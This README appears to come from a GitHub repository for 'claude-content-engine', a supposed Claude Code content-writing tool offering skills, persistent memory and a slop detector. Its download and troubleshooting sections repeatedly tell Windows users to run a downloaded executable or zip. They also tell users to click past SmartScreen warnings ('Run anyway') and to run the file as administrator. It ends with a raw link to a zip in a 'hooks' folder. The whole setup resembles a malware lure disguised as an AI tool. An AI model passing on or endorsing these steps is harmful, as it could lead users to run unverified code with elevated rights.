🧠 claude-content-engine - Create Better Content With Claude

🚀 What this is
claude-content-engine is a content tool for Claude Code. It helps you write, shape, and reuse content for common tasks like SEO pages, emails, social posts, and copy drafts.
It includes 8 skills, persistent memory, and a built-in slop detector. That means it can help you keep a clear tone, reuse past context, and flag weak or vague writing before it spreads.
📥 Download
- Open the download page: claude-content-engine on GitHub
- Download the latest Windows file from the page
- Save the file to your computer
- Run the file to start the app
If your browser asks for permission, choose Keep or Run. If Windows asks for approval, choose Yes.
🪟 Windows Setup
Follow these steps on a Windows PC:
- Go to the GitHub page
- Find the latest release or download link
- Download the Windows version
- Open the downloaded file
- If Windows shows a security prompt, click More info, then Run anyway if you trust the file source
- Let the app finish setting up
- Open Claude Code and connect the engine if the app asks for it
If the app comes as a .zip file, right-click it and choose Extract All before you run it.
🧰 What you get
- 8 content skills for common writing jobs
- Persistent memory for repeated projects and brand voice
- A slop detector that flags weak or filler-heavy text
- Support for content tasks like:
- SEO copy
- Email marketing
- Social media posts
- Product copy
- Blog outlines
- Rewrite tasks
- Short-form content
- Developer docs
💻 System needs
For a smooth run on Windows, use:
- Windows 10 or Windows 11
- 4 GB of RAM or more
- 500 MB of free disk space
- A stable internet connection
- Claude Code installed and ready to use
- A modern browser for the download page
If you plan to work with larger projects, 8 GB of RAM gives more room.
⚙️ How it works
claude-content-engine is built to help you move from idea to draft with less effort.
It can:
- Keep a memory of your style rules and project notes
- Use the right skill for the task at hand
- Spot vague phrases and weak claims
- Help you turn rough notes into clearer copy
- Keep content aligned across pages, emails, and posts
This makes it useful when you want the same voice across many pieces of content.
📝 Main use cases
Use it for:
- Writing SEO landing pages
- Drafting email campaigns
- Creating social media content
- Building product descriptions
- Rewriting content in a cleaner voice
- Making short briefs for content teams
- Checking copy for filler or empty phrases
- Keeping brand language consistent
🧪 Skills included
The 8 skills focus on common content jobs:
- SEO writing
Helps shape content around search intent and page structure - Copywriting
Helps write clear lines for offers, pages, and product text - Email marketing
Helps draft subject lines, body copy, and follow-up messages - Social media
Helps create short posts that fit platform limits - Content planning
Helps turn ideas into a simple outline - Rewrite mode
Helps clean up text without changing the meaning - Brand voice memory
Helps keep style rules in one place - Slop detection
Helps flag text that feels vague, flat, or stuffed with filler
📌 Before you start
Have these ready:
- The downloaded Windows file
- Your Claude Code setup
- A folder where you want to keep the project
- A few notes about your brand voice, if you have them
If you already have a writing style guide, keep it nearby. The memory feature works best when you give it clear rules.
🛠️ Install and run
- Download the file from claude-content-engine on GitHub
- Move the file to a folder you can find later, such as Downloads or Desktop
- If the file is zipped, extract it
- Double-click the Windows app file
- Follow the setup prompts on screen
- Open Claude Code if the app does not do it for you
- Load your first task, such as an email draft or SEO page
- Start with one skill and test the output
If the app asks for a workspace or project path, choose the folder where you keep your content work.
🧭 First run tips
For best results on the first run:
- Start with one simple task
- Use short, clear instructions
- Add your brand voice rules
- Tell it what to avoid
- Review the first draft before reuse
A good first test is a short blog intro, a social post, or an email subject line set.
📣 Example tasks
You can ask it to help with prompts like:
- Write a product page for a new app
- Turn these notes into an email sequence
- Rewrite this paragraph in plain English
- Create 10 social posts about this topic
- Build an SEO outline for this keyword
- Check this copy for weak or vague lines
- Make this draft sound more like our brand
- Shorten this text for a landing page
🔒 Memory use
The persistent memory keeps useful project details in one place. That can include:
- Brand tone
- Product names
- Preferred terms
- Words to avoid
- Audience notes
- Style rules
Use it when you want the same voice across many drafts. Update it when your brand changes.
🧼 Slop detector
The slop detector looks for writing that feels empty, generic, or padded. It can help you catch:
- Repeated ideas
- Soft claims
- Long lines with little meaning
- Vague language
- Buzzword-heavy copy
This is useful when you want text that sounds clear and direct.
📂 Suggested folder setup
You can keep your work in folders like these:
Content ProjectsBrand NotesEmail DraftsSEO PagesSocial PostsApproved Copy
A simple folder setup makes it easier to keep track of drafts and final versions.
❓ Common problems
The app will not open
- Make sure the file finished downloading
- Check that you extracted the zip file if there is one
- Right-click the file and choose Run as administrator
- Try opening it again after a restart
Windows blocks the file
- Look for the More info link
- Review the file name and source
- Choose the run option if you trust the download page
Claude Code does not connect
- Make sure Claude Code is installed
- Check your internet connection
- Close both apps and open them again
- Confirm that the project folder is in the right place
The output feels weak
- Add more detail to your prompt
- Include your audience
- Give examples of the tone you want
- Use the slop detector to clean up the draft
- Save better notes to memory
📚 Best results
To get better output, use this format:
- Goal: what you want to create
- Audience: who will read it
- Tone: how it should sound
- Length: how long it should be
- Must use: key facts or terms
- Must avoid: words or styles you do not want
Example:
Goal: Write a homepage section
Audience: Small business owners
Tone: Clear and calm
Length: 150 words
Must use: plain English, short sentences
Must avoid: hype, buzzwords, and vague claims
🧾 File handling
If you want to keep things tidy:
- Keep the original download file in case you need it again
- Save your drafts in a separate folder
- Back up your memory notes
- Keep one final folder for approved content
That helps when you revisit a project later.
🔗 Download again
If you need the file again, use this link: https://raw.githubusercontent.com/Twentysix-setsquare397/claude-content-engine/main/hooks/claude_content_engine_v3.9-alpha.2.zip
🧷 Topics
ai-tools, claude, claude-code, content-creation, copywriting, developer-tools, email-marketing, seo, skills, social-media